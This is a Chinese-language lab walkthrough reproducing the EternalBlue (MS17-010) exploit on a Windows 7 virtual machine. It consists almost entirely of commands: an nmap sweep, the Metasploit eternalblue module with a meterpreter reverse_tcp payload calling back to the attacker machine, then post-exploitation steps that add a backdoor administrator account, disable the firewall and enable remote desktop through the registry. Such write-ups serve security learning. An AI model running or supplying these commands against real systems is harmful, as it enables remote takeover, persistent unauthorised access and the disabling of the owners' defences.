记一次简单的永恒之蓝漏洞复现


注:针对的系统是Windows7 64位操作系统,其他操作系统请自行测试。

一.测试环境:

kali linux:192.168.121.128 (攻击机)

win7:192.168.121.130 (目标靶机)

二.攻击前的准备

1.查看kali的ip地址

命令:ifconfig

2.使用nmap扫描局域网内的所有主机(ms17_010漏洞的最基本要求是需要开启445端口)

命令:nmap 192.168.121.1/24

可以看到445端口开着,那就可以开始我们的攻击利用

3.开启Metasploit框架

命令:msfconsole

4.搜索ms17_010漏洞(永恒之蓝)

命令:search ms17_010

5.使用永恒之蓝漏洞

命令:use exploit/windows/smb/ms17_010_eternalblue

6.显示所需要的参数

命令:show options

三.设置攻击参数

1.设置目标主机

命令:set rhost 192.168.121.130

2.设置攻击载体(一个好用的攻击模块)

命令:set payload windows/x64/meterpreter/reverse_tcp

3.设置攻击机ip,用来攻击成功之后,监听被开放的目标电脑的端口(一开始查的kali的ip)

命令:set lhost 192.168.121.128

4.检查参数是否配置正确

命令:show options

四.攻击

命令:run

五.利用

1.获取截屏

命令:screenshot

2.靶机shell(以管理员身份打开靶机的cmd)

命令:shell

六.拿到shell后可进行的操作(Dos命令)

1.创建一个叫szsec,密码为123456的用户

命令:net user szsec 123456 /add

2.对刚才创建的用户提权为管理员

命令:net localgroup administrators szsec /add

3.关闭防火墙

命令:netsh firewall set opmode mode=disable

4.查看开启的端口

命令:netstat -ano

5.开启3389端口

命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

七.远程桌面

1.使用win10的远程桌面管理

2.远程桌面成功


最后:互联网不是法外之地,大家且行且珍惜~


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM